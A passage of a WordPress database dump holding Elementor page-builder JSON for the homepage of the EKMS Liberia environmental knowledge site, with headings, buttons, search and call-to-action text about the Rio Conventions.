Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5890,529,'_elementor_version','2.7.5'),(5891,529,'_elementor_template_type','wp-page'),(5893,530,'_wp_page_template','default'),(5894,530,'_elementor_edit_mode','builder'),(5895,530,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50